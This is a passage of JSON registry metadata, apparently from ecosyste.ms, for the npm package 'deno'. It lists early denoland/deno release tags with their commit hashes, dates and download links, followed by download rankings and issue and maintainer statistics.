dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T00:48:28.790Z","dependent_packages_count":7,"downloads":577379,"downloads_period":"last-month","dependent_repos_count":7,"rankings":{"downloads":3.2932428594538203,"dependent_repos_count":4.320722161505019,"dependent_packages_count":2.770450546233896,"stargazers_count":10.051852927668895,"forks_count":8.86762447197996,"docker_downloads_count":null,"average":5.860778593368318},"purl":"pkg:npm/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https: